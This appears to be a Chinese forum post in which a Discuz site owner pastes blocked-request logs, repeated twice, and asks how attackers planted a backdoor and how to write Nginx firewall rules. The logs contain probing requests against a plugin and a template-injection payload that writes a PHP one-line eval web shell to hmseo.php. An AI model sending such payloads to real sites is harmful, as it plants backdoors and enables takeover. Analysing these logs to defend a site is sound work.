论坛被上传一句话木马函数eval-1719
2020/08/20 08:54:48
十月份
<?PHP exit;?> 1572107794 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572108553 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
十一月份
<?PHP exit;?> 1572630519 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
这两天连续被人用同一种方法挂马了两次,虽然有用安全软件,没修复的话总感觉心里不踏实。
有没有大佬能看懂是如何挂马的?怎么修复?使用安全软件的Nginx防火墙的话怎么添加规则内容?是否都需要在过滤中添加?
问题有点多,再次拜谢大佬们了
<?PHP exit;?> 1572107794 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572108553 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
十一月份
<?PHP exit;?> 1572630519 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
这两天连续被人用同一种方法挂马了两次,虽然有用安全软件,没修复的话总感觉心里不踏实。
有没有大佬能看懂是如何挂马的?怎么修复?使用安全软件的Nginx防火墙的话怎么添加规则内容?是否都需要在过滤中添加?
问题有点多,再次拜谢大佬们了